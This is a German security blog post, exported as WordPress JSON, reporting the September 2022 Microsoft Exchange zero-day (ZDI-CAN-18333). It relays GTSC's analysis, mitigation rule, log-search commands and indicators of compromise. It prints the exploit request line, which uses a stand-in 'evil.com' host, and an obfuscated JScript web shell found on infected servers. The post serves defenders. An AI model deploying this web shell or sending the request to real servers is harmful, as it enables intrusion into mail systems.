{"id":273305,"date":"2022-09-30T01:24:35","date_gmt":"2022-09-29T23:24:35","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=273305"},"modified":"2022-11-16T08:54:48","modified_gmt":"2022-11-16T07:54:48","slug":"exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/","title":{"rendered":"Exchange Server werden &uuml;ber 0-day Exploit angegriffen (29. Sept. 2022)"},"content":{"rendered":"<p><img decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline; border-width: 0px;\" title=\"Exchange Logo\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2022\/06\/Exchange.jpg\" alt=\"Exchange Logo\" align=\"left\" border=\"0\" \/>[<a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\" target=\"_blank\" rel=\"noopener\">English<\/a>]Unsch\u00f6ner Sachverhalt f\u00fcr Administratoren und Betreiber einer On-Premises Microsoft Exchange-Server-Installation. Es gibt Berichte, dass ein neuer Zero-Day in Microsoft Exchange existiert, der aktiv in freier Wildbahn ausgenutzt wird. Sicherheitsforscher best\u00e4tigen, dass einige Installationen &#8211; einschlie\u00dflich eines Honeypots &#8211; bereits infiziert sind. Details zum Zero-Day liegen noch nicht vor. Hier ein \u00dcberblick, was mir bisher bekannt ist und was man ggf. unternehmen kann, um Angriffe zu entdecken. <strong>Erg\u00e4nzung:<\/strong> Microsoft hat einige Informationen ver\u00f6ffentlicht, die ich in einem Folgebeitrag zusammen gefasst habe.<\/p>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg05.met.vgwort.de\/na\/b4ef2c894ede4b3795d920bbe087f012\" alt=\"\" width=\"1\" height=\"1\" \/>Ich bin vor wenigen Minuten \u00fcber <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">Twitter<\/a> auf den Sachverhalt gesto\u00dfen. Sicherheitsforscher Kevin Beaumont warnt vor einer potentiellen Gefahr, die Exchange Servern durch einen Zero-Day-Exploit droht. Parallel traf bereits eine Mail von von Blog-Leser Marco D. ein (danke daf\u00fcr), der mich folgenderma\u00dfen \u00fcber den Sachverhalt informierte:<\/p>\n<blockquote><p>Das habe ich eben auf <a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\">Twitter<\/a> entdeckt, ein Zero Day Exploit f\u00fcr Exchange:<\/p><\/blockquote>\n<p><a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchange 0day exploit in wild\" src=\"https:\/\/i.imgur.com\/NMXrZy7.png\" alt=\"Exchange 0day exploit in wild\" \/><\/a><\/p>\n<blockquote><p>Ich kenne die verlinkte vietnamesische Seite nicht, aber der Inhalt schien mir schl\u00fcssig, zumal auch die ZDI-Eintr\u00e4ge existieren.<\/p><\/blockquote>\n<h2>Erste Meldung von GTSC<\/h2>\n<p>Der Artikel <a href=\"https:\/\/web.archive.org\/web\/20221026020832\/https:\/\/www.gteltsc.vn\/blog\/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\" target=\"_blank\" rel=\"noopener\">WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER<\/a> eines Autors aus Vietnam scheint die erste Quelle zu sein, die das Problem beschreibt. Das Sicherheitsteam des vietnamesischen Cybersicherheitsunternehmen GTSC entdeckte Anfang August 2022 im Rahmen von Sicherheits\u00fcberwachungs- und Incident-Response-T\u00e4tigkeiten, dass eine kritische Infrastruktur angegriffen wurde. Betroffen waren Microsoft Exchange Server der betreffenden Organisationen.<\/p>\n<p>W\u00e4hrend der Untersuchung stellten die Experten des Blue Teams von GTSC fest, dass der Angriff eine unver\u00f6ffentlichte Exchange-Sicherheitsl\u00fccke, d.h. eine 0-Day-Schwachstelle, ausnutzte. Das Team erstellte unverz\u00fcglich einen Plan f\u00fcr Gegenma\u00dfnahmen, um die Angriffe zu stoppen. Gleichzeitig begann das GTSC Red Teams damit, den dekompilierten Code von Exchange zu untersuchen und zu debuggen, um die Sicherheitsl\u00fccke und den Exploit-Code zu finden.<\/p>\n<p>Es wurde eine bisher unbekannte Schwachstelle (Zero-Day) gefunden, die sich als so kritisch erwies, dass sie Angreifer eine Remote Code Execution (RCE) auf dem kompromittierten Zielsystem erm\u00f6glicht. GTSC meldete die Schwachstelle sofort an die Zero Day Initiative (ZDI), um mit Microsoft zusammenzuarbeiten. Ziel war es, schnellstm\u00f6glich einen Patch zu erstellen. Die Zero Day Initiative (ZDI) hat 2 Fehler mit den CVSS-Scores 8.8 und 6.3 in Bezug auf den Exploit verifiziert und best\u00e4tigt.<\/p>\n<ul>\n<li>ZDI-CAN-18333 CVSS 8.8<\/li>\n<li>ZDI-CAN-18802 CVSS 6.3<\/li>\n<\/ul>\n<p>Die Sicherheitsforscher von GTSC stellte fest, dass auch andere Kunden von einem \u00e4hnlichen Problem betroffen sind. Nach Tests konnten best\u00e4tigt werden, dass diese Systeme \u00fcber diese 0-Day-Schwachstelle angegriffen wurden.<\/p>\n<h2>Sicherheitsforscher best\u00e4tigen die Angriffe<\/h2>\n<p>Mit waren die <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">Tweets<\/a> von Sicherheitsforscher Kevin Beaumont aufgefallen, der auf Twitter best\u00e4tigt, dass einige Installationen &#8211; einschlie\u00dflich eines Honeypots &#8211; bereits infiziert sind.<\/p>\n<p><a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchang 0-day (Sept 2022)\" src=\"https:\/\/i.imgur.com\/cjgycAG.png\" alt=\"Exchang 0-day (Sept 2022)\" \/><\/a><\/p>\n<p>Bisher gibt es keinen Patch zum Schlie\u00dfen der Schwachstelle von Microsoft &#8211; und es sieht auch nicht so aus, als ob Microsoft Kunden \u00fcber das Problem informiert habe.<\/p>\n<h2>Details des Angriffs<\/h2>\n<p>Im Rahmen der Bereitstellung von Dienstleistungen im Security Operations Center (<em>SOC<\/em>) f\u00fcr einen Kunden entdeckte das GTSC Blueteam Exploit-Anfragen in IIS-Protokollen mit dem gleichen Format wie die lange bekannte ProxyShell-Schwachstelle. Kevin Beaumont schreibt hier, dass die Angreifer vorgeben, ein Exchange EWS zu sein, um eine Hintert\u00fcr einzurichten. Der Angriff erfolgt \u00fcber folgenden Request:<\/p>\n<pre><code>autodiscover\/autodiscover.json?@evil.com\/&lt;Exchange-backend-endpoint&gt;&amp;Email=autodiscover\/autodiscover.json%3f@evil.com<\/code><\/pre>\n<p>Der obige Link wird verwendet, um auf eine Komponente im Backend zuzugreifen, in der dann der Remote Code Exploit (RCE) implementiert werden k\u00f6nnte. Die Angreifer bedienen sich, laut GTSC, verschiedener Techniken, um Hintert\u00fcren in das betroffene Exchange-System einzubauen und sich dann lateral im Netzwerk zu anderen Servern im System zu bewegen.<\/p>\n<p>Bei den Untersuchungen entdeckten die Sicherheitsforscher Webshells, die meist versteckt auf den infizierten Exchange-Servern angelegt wurden. Anhand des User-Agents konnte das Team von GTSC feststellen, dass der Angreifer Antsword verwendet. Dies ist ein aktives, von Chinas Hackern genutztes, plattform\u00fcbergreifendes Open-Source-Website-Verwaltungstool, das die Verwaltung von Webshells unterst\u00fctzt. Hier ein JScript dazu:<\/p>\n<pre>&lt;%@Page Language=\"Jscript\"%&gt;\r\n&lt;%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'\r\n+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+\r\nSystem.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))\r\n+char(51450\/525)+''+''+char(0640-0462)+char(0x8c28\/0x1cc)+char(0212100\/01250)\r\n+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))\r\n+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'\r\n+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%&gt;<\/pre>\n<p>Das Sicherheitsteam vermutet, dass diese Backdoors von einer chinesischen Angriffsgruppe stammen, da die Webshell Codepage 936 verwendet, eine Microsoft-Zeichenkodierung f\u00fcr vereinfachtes Chinesisch. Ein weiteres bemerkenswertes Merkmal sei, so die Sicherheitsforscher, dass der Hacker auch den Inhalt der Datei <em>RedirSuiteServiceProxy.aspx <\/em>f\u00fcr die Webshell modifizieren. RedirSuiteServiceProxy.aspx ist ein legitimer Dateiname, der auf dem Exchange-Server verf\u00fcgbar ist.<\/p>\n<table border=\"0\" width=\"640\" cellspacing=\"0\" cellpadding=\"2\">\n<tbody>\n<tr>\n<td valign=\"top\" width=\"192\"><strong>FileName<\/strong><\/td>\n<td valign=\"top\" width=\"448\"><strong>Path<\/strong><\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">RedirSuiteServiceProxy.aspx<\/td>\n<td valign=\"top\" width=\"448\">C:\\ProgramFiles\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">Xml.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\inetpub\\wwwroot\\aspnet_client<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">pxh4HG1v.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\ProgramFiles\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Obwohl im Exploit Angriffstechniken eingesetzt wurden, die auch f\u00fcr die fr\u00fcher bekannte ProxyShell-Schwachstelle verwendet wurden, ergab die \u00dcberpr\u00fcfung der infizierten Exchange-Server, dass dort das letzte Exchange Update bereits installiert war. Eine Ausnutzung der Proxyshell-Schwachstelle war also unm\u00f6glich. Die Blueteam-Analysten von GTSC best\u00e4tigen, dass es sich um eine neue 0-Day-RCE-Schwachstelle handelt. Details zur Vorgehensweise beim Angriff und weitere Erkenntnisse der Analyse werden <a href=\"https:\/\/web.archive.org\/web\/20221026020832\/https:\/\/www.gteltsc.vn\/blog\/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\" target=\"_blank\" rel=\"noopener\">hier<\/a> offen gelegt.<\/p>\n<h2>Workarounds zum Abschw\u00e4chen der Schwachstelle<\/h2>\n<p>Die GTSC-Sicherheitsforscher schlagen in <a href=\"https:\/\/web.archive.org\/web\/20221026020832\/https:\/\/www.gteltsc.vn\/blog\/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\" target=\"_blank\" rel=\"noopener\">ihrem Artikel<\/a> Ma\u00dfnahmen vor, um die Ausnutzbarkeit der 0-day-Schwachstelle in vollst\u00e4ndig gepatchten Exchange Servern zu verhindern. Zur Blockade von Angriffsversuchen ist eine neue <em>URL Rewrite-<\/em>Regel<em> im <\/em>IIS-Server hinzuzuf\u00fcgen:<\/p>\n<ul>\n<li>W\u00e4hlen Sie im FrontEnd in <u><em>Autodiscover<\/em><\/u> die Registerkarte <em>URL Rewrite <\/em>und dann <em>Request Blocking<\/em><\/li>\n<li>F\u00fcgen Sie die Zeichenfolge <em>\".*autodiscover\\.json.*\\@.*Powershell.*\"<\/em> zum URL-Pfad hinzu<\/li>\n<li>Als Bedingung ist {REQUEST_URI} zu w\u00e4hlen<\/li>\n<\/ul>\n<p>Im <a href=\"https:\/\/web.archive.org\/web\/20221026020832\/https:\/\/www.gteltsc.vn\/blog\/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\" target=\"_blank\" rel=\"noopener\">Artikel<\/a> finden sich entsprechende Screenshots. Die Sicherheitsforscher empfehlen allen\u00a0 Organisationen\/Unternehmen, die Microsoft Exchange Server verwenden, die oben genannten tempor\u00e4ren Abhilfema\u00dfnahmen schnellstm\u00f6glich anzuwenden, um potenzielle Angriffe zu verhindern.<\/p>\n<h2>Pr\u00fcfung auf Kompromittierung<\/h2>\n<p>Um zu \u00fcberpr\u00fcfen, ob ein Exchange Server bereits von einem Angriff betroffen ist, hat GTSC einen Leitfaden und ein Tool zum Scannen von IIS-Protokolldateien ver\u00f6ffentlicht (standardm\u00e4\u00dfig im Ordner %SystemDrive%\\inetpub\\logs\\LogFiles gespeichert):<\/p>\n<p><strong>Methode 1:<\/strong> Verwenden Sie den Powershell-Befehl:<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\.json.*\\@.*200'<\/code><\/pre>\n<p><strong>Erg\u00e4nzung:<\/strong> Auf Facebook hat mich ein Administrator darauf hingewiesen, dass er einige Anpassungen am PowerShell-Befehl vornehmen musste. Hier seine Kommentare:<\/p>\n<blockquote><p>Bez\u00fcglich des PS-Befehls f\u00fcr die Logfiles zu durchsuchen: Ich hab mir testweise mal ein eigenes Logfile angelegt mit dem entsprechenden Pattern:<\/p>\n<p>'powershell.*autodiscover\\.json.*\\@.*200'<\/p>\n<p>auf unserem 2016ner (deutsche Sprache) findet er das Pattern nicht und gibt somit auch keine Ergebnisse zur\u00fcck und es sieht aus als w\u00e4re alles in Ordnung.<\/p>\n<p>Wenn man das Pattern dann k\u00fcrzt auf nur 'powershell.*autodiscover' findet er auch die Ergebnisse. Getestet mit PS x86 &amp; x64.<\/p><\/blockquote>\n<p>und erg\u00e4nzte dann:<\/p>\n<blockquote><p>Hab eben noch etwas rumgespielt. Am Ende des PS-Befehls muss noch ein \"-SimpleMatch\" ansonsten erkennt er den ersten \"\\\" in dem Pattern als Regular Expressions, erkennt somit das Pattern nicht richtig und gibt keine Ergebnisse zur\u00fcck.<\/p>\n<p>Ansonsten kann\u00a0man die beiden \"\\\" durch zwei \"\\\\\" ersetzen somit wird der Backslash als tats\u00e4chlicher Backslash erkannt.<\/p><\/blockquote>\n<p>Nachfolgender PowerShell-Befehl verwendet die \\\\<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\\\.json.*\\\\@.*200'<\/code><\/pre>\n<p>und funktioniert als Befehl bei dem betreffenden Administrator (siehe auch folgenden Screenshot).<\/p>\n<p><a href=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" alt=\"Check with PowerShell \" width=\"646\" height=\"109\" \/><\/a><br \/>\nZum <a href=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" target=\"_blank\" rel=\"noopener\">Vergr\u00f6\u00dfern klicken<\/a><\/p>\n<p><strong>Methode 2:<\/strong> Verwenden Sie das vom GTSC entwickelte Tool.<\/p>\n<p>Auf der Grundlage der Exploit-Signatur haben die GTSC-Leute ein Tool erstellt, das eine viel k\u00fcrzere Suchzeit als die Powershell ben\u00f6tigt. Das Tool l\u00e4sst sich auf <a href=\"https:\/\/github.com\/ncsgroupvn\/NCSE0Scanner\" target=\"_blank\" rel=\"noopener\">GitHub herunterladen<\/a>. Im Im <a href=\"https:\/\/web.archive.org\/web\/20221026020832\/https:\/\/www.gteltsc.vn\/blog\/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\" target=\"_blank\" rel=\"noopener\">Artikel<\/a> haben die Sicherheitsforscher von GTSC noch einige Indicators of Compromise (IOCs) angegeben, \u00fcber die eine Infektion erkennbar ist:<\/p>\n<p><strong>Webshell:<\/strong><\/p>\n<p><strong>File Name: <\/strong>pxh4HG1v.ashx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx<\/p>\n<p><strong>File Name:<\/strong> RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>File Name:<\/strong> <strong>RedirSuiteServiceProxy.aspx<\/strong><\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>File Name: <\/strong>Xml.ashx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>Xml.ashx<\/p>\n<p><strong>Filename<\/strong>: errorEE.aspx<\/p>\n<p><strong>SHA256<\/strong>: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257<\/p>\n<p><strong>Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx<\/p>\n<p><strong>DLL:<\/strong><\/p>\n<p><strong>File name:<\/strong> Dll.dll<\/p>\n<p><strong>SHA256:<\/strong><\/p>\n<p>074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82<\/p>\n<p>45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9<\/p>\n<p>9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0<\/p>\n<p>29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3<\/p>\n<p>c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2<\/p>\n<p><strong>File name<\/strong>: 180000000.dll (Dump t\u1eeb ti\u1ebfn tr\u00ecnh Svchost.exe)<\/p>\n<p><strong>SHA256<\/strong>: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e<\/p>\n<p><strong>IP:<\/strong><\/p>\n<p>125[.]212[.]220[.]48<\/p>\n<p>5[.]180[.]61[.]17<\/p>\n<p>47[.]242[.]39[.]92<\/p>\n<p>61[.]244[.]94[.]85<\/p>\n<p>86[.]48[.]6[.]69<\/p>\n<p>86[.]48[.]12[.]64<\/p>\n<p>94[.]140[.]8[.]48<\/p>\n<p>94[.]140[.]8[.]113<\/p>\n<p>103[.]9[.]76[.]208<\/p>\n<p>103[.]9[.]76[.]211<\/p>\n<p>104[.]244[.]79[.]6<\/p>\n<p>112[.]118[.]48[.]186<\/p>\n<p>122[.]155[.]174[.]188<\/p>\n<p>125[.]212[.]241[.]134<\/p>\n<p>185[.]220[.]101[.]182<\/p>\n<p>194[.]150[.]167[.]88<\/p>\n<p>212[.]119[.]34[.]11<\/p>\n<p><strong>URL:<\/strong><\/p>\n<p>hxxp:\/\/206[.]188[.]196[.]77:8080\/themes.aspx<\/p>\n<p><strong>C2:<\/strong><\/p>\n<p>137[.]184[.]67[.]33<\/p>\n<h2>Microsoft reagiert<\/h2>\n<p><strong>Erg\u00e4nzung:<\/strong> Microsoft hat inzwischen reagiert und einige Informationen bereitgestellt. Ich habe das Ganze im Blog-Beitrag\u00a0<a href=\"https:\/\/borncity.com\/blog\/2022\/09\/30\/microsofts-empfehlungen-fr-die-exchange-server-0-day-schwachstelle-zdi-can-18333\/\" rel=\"bookmark noopener noreferrer\" data-wpel-link=\"internal\">Microsofts Empfehlungen f\u00fcr die Exchange Server 0-day-Schwachstelle ZDI-CAN-18333<\/a> zusammen gefasst. Dort geht auch hervor, welche Exchange-Varianten betroffen sind und warum bei Exchange Online eher keine erfolgreichen Angriffe drohen. Danke an die Blog-Leser f\u00fcr die zahlreichen Hinweise und Links auf inzwischen erschienene Artikel.<\/p>\n<p><strong>Artikelreihe:<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\" rel=\"noopener noreferrer\" data-wpel-link=\"internal\">Exchange Server werden \u00fcber 0-day Exploit angegriffen (29. Sept. 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/09\/30\/microsofts-empfehlungen-fr-die-exchange-server-0-day-schwachstelle-zdi-can-18333\/\" rel=\"noopener noreferrer\" data-wpel-link=\"internal\">Microsofts Empfehlungen f\u00fcr die Exchange Server 0-day-Schwachstelle ZDI-CAN-18333<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/10\/01\/neues-zur-exchange-server-0-day-schwachstelle-zdi-can-18333-korrekturen-scripte-und-ep-lsung\/\" rel=\"noopener noreferrer\" data-wpel-link=\"internal\">Neues zur Exchange Server 0-day-Schwachstelle ZDI-CAN-18333: Korrekturen, Scripte und EMS-L\u00f6sung<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/10\/04\/exchange-server-microsofts-0-day-schutz-aushebelbar-neue-einschtzungen-3-oktober-2022\/\" rel=\"noopener noreferrer\" data-wpel-link=\"internal\">Exchange Server: Microsofts 0-day-Schutz aushebelbar, neue Einsch\u00e4tzungen (3. Oktober 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/10\/05\/exchange-server-microsofts-bessert-lsungen-fr-0-day-schutz-nach-5-oktober-2022\/\" rel=\"noopener noreferrer\" data-wpel-link=\"internal\">Exchange Server: Microsofts bessert L\u00f6sungen f\u00fcr 0-day-Schutz nach (5. Oktober 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/10\/11\/exchange-server-microsofts-bessert-lsungen-fr-0-day-schutz-nach-8-oktober-2022\/\">Exchange Server: Microsofts bessert L\u00f6sungen f\u00fcr 0-day-Schutz nach (8. Oktober 2022)<\/a><\/p>\n<p><strong>\u00c4hnliche Artikel:<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/08\/10\/exchange-server-sicherheitsupdates-9-august-2022\/\">Exchange Server Sicherheitsupdates (9. August 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/03\/11\/probleme-mit-exchange-mrz-2022-updates\/\">Probleme mit Exchange M\u00e4rz 2022-Updates<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2021\/04\/15\/exchange-update-fehler-und-infos-13-april-2021\/\">Exchange Update-Fehler und -Infos (13. April 2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2021\/03\/05\/exchange-probleme-mit-ecp-nach-sicherheitsupdate-mrz-2021\/\">Exchange-Probleme mit ECP\/OWA-Suche nach Sicherheitsupdate (M\u00e4rz 2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2021\/07\/13\/exchange-2016-2019-outlook-probleme-durch-amsi-integration\/\">Exchange 2016\/2019: Outlook-Probleme durch AMSI-Integration<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2021\/09\/27\/exchange-server-september-2021-cu-kommt-zum-28-9-2021-mit-microsoft-exchange-emergency-mitigation-service\/\">Exchange Server September 2021 CU kommt zum 28.9.2021 mit Microsoft Exchange Emergency Mitigation Service<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2021\/08\/28\/exchange-server-2016-2019-benutzerdefinierte-attribute-in-ecp-nach-cu-installation-juli-2021-nicht-mehr-aktualisierbar\/\">Exchange Server 2016-2019: Benutzerdefinierte Attribute in ECP nach CU-Installation (Juli 2021) nicht mehr aktualisierbar<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/08\/30\/exchange-extended-protection-checkliste-und-probleme\/\">Exchange: Extended Protection, Checkliste und Probleme<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/09\/16\/update-fr-exchange-extended-protection-script-aber-weiterhin-fehler\/\">Update f\u00fcr Exchange Extended Protection-Script, aber weiterhin Fehler<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2022\/09\/29\/exchange-health-checker-script-erweiterungen-von-frank-zchling\/\">Exchange Health Checker \u2013 Script-Erweiterungen von Frank Z\u00f6chling<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[English]Unsch\u00f6ner Sachverhalt f\u00fcr Administratoren und Betreiber einer On-Premises Microsoft Exchange-Server-Installation. Es gibt Berichte, dass ein neuer Zero-Day in Microsoft Exchange existiert, der aktiv in freier Wildbahn ausgenutzt wird. Sicherheitsforscher best\u00e4tigen, dass einige Installationen &#8211; einschlie\u00dflich eines Honeypots &#8211; bereits infiziert &hellip; <a href=\"https:\/\/borncity.com\/blog\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\">Weiterlesen <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426,7459,2557],"tags":[5359,4328],"class_list":["post-273305","post","type-post","status-publish","format-standard","hentry","category-sicherheit","category-software","category-windows-server","tag-exchange","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/273305","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=273305"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/273305\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=273305"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=273305"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=273305"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}